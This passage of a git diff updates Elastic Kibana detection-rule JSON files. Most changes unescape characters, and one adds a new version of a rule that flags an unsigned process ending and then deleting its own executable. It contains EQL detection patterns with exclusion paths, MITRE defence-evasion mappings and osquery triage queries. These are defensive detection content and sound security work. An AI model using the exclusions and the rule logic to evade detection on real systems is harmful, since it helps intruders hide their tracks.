'%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", "related_integrations": [ { @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json index 7a95058ce16..09e05447717 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by 
the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", "related_integrations": [ { @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_108.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_108.json new file mode 100644 index 00000000000..ee9b19f1a72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_108.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Termination followed by Deletion", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*\\\\DismHost.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\DismHost.exe\",\n \"?:\\\\$WinREAgent\\\\Scratch\\\\*\\\\DismHost.exe\",\n \"?:\\\\Windows\\\\tenable_mw_scan_*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\LogiUI\\\\Pak\\\\uninstall.exe\"\n )\n ] by file.path\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + 
"name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "09443c92-46b3-45a4-8f25-383b028b258d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + }, + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "09443c92-46b3-45a4-8f25-383b028b258d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json index d1e694a6394..d50d961d6f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json +++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json
index de28f5b43fe..b14c1c4ab56 100644
--- a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json
index d6b44381e85..5d71576b9e9 100644
--- a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json
index 03044de57a5..96343e41643 100644
--- a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json
index 931551b428d..caec69a43ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json
index d7eae65162b..f4fc9dbc9ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json
index c3063466d68..aebdca2b7f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json
@@ -46,7 +46,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json
index 5334a4e61a5..fc1441414cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json
index 7dabb72dac4..dbbab0b5bae 100644
--- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json
index eaf163e8adc..6e888fa4f58 100644
--- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
